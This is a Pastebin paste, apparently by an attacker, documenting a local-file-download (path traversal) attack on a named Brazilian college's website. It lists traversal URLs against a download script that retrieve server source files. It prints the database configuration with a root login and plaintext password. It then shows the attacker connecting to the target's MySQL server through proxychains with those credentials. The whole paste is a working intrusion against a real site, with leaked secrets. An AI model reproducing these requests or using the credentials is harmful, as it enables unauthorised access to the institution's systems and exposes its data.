Advertisement
Frenetic

[Frenetic] LFD - Faculdade Milton Campos

Aug 9th, 2017
137
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 1.27 KB | None | 0 0
  1. Local FIle Download - Faculdade Milton Campos
  2. Twitter: https://twitter.com/0xFrenetic
  3. Link para Tweet: https://twitter.com/0xFrenetic/status/895480809288679424
  4.  
  5. Alvo: http://www.mcampos.br/
  6.  
  7. # http://www.mcampos.br/mestrado/download.php?baixar=../index.php
  8. # http://www.mcampos.br/mestrado/download.php?baixar=../includes/code.php
  9. # http://www.mcampos.br/mestrado/download.php?baixar=../_i/_lib.php
  10. # http://www.mcampos.br/mestrado/download.php?baixar=../_i/_db.php
  11.  
  12. --> Arquivo: /_db.php
  13.  
  14. /* ***************** CONFIGURACAO ***************** */
  15.  
  16. $vhost = '127.0.0.1'; // host
  17. $vlogin = 'root'; // login
  18. $vsenha = 'kqd21gp'; // senha
  19. $vbanco = 'z_miltoncampos'; // banco de dados
  20.  
  21. --> Fim Arquivo: /_db.php
  22.  
  23. --> Conectando Alvo:
  24.  
  25. frenetic@frenetic:~$ proxychains mysql -h www.mcampos.br -u root -p
  26. Enter password:
  27.  
  28. Your MySQL connection id is 1236
  29. Server version: 5.0.41-community-nt MySQL Community Edition (GPL)
  30.  
  31. Copyright (c) 2000, 2017, Oracle and/or its affiliates. All rights reserved.
  32.  
  33. Oracle is a registered trademark of Oracle Corporation and/or its
  34. affiliates. Other names may be trademarks of their respective
  35. owners.
  36.  
  37. Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
  38.  
  39. mysql>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement